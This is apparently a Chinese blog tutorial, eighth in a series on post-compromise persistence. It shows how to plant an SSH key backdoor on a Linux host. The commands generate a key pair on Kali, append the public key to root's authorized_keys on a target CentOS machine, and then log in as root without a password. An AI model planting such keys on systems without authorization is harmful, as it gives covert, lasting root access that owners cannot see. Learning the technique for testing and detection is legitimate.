操作系统权限维持(八)之Linux系统-SSHKey后门

系列文章

操作系统权限维持(一)之Windows系统-粘贴键后门
操作系统权限维持(二)之Windows系统-克隆账号维持后门
操作系统权限维持(三)之Windows系统-启动项维持后门
操作系统权限维持(四)之Windows系统-计划任务维持后门
操作系统权限维持(五)之Windows系统-系统服务维持后门
操作系统权限维持(六)之Linux系统-定时任务后门
操作系统权限维持(七)之Linux系统-SUID后门

SSHKey后门

当我们具有写入权限的时候,我们同样可以自行生成密钥,当kali机器第一次生成密钥的时候,并且把公钥放在了你的服务器上面,当你把公钥放在服务器上面的时候,这就意味着他可以正常的解密和加密你发过来的内容,后面你就是通过加解密去认证会话的,并不需要输入密码

生成密钥和查看公钥(kali执行):

ssh-keygen -t rsa 
cd /root/.ssh 
ls
cat id_rsa.pub

操作系统权限维持(八)之Linux系统-SSHKey后门_第1张图片

将 id_rsa.pub文件中的内容拷贝到目标机器上并且写入到 authorized_keys这个文件夹下

在这里插入图片描述

写入(CentOS执行):

 cd /root/.ssh 
vim authorized_keys

操作系统权限维持(八)之Linux系统-SSHKey后门_第2张图片

现在我们不需要密码就能连接目标机器了

连接(Kali执行):

ssh [email protected]

在这里插入图片描述

操作系统权限维持(八)之Linux系统-SSHKey后门_第3张图片

你可能感兴趣的:(操作系统权限维持,linux,服务器,网络安全,网络,安全)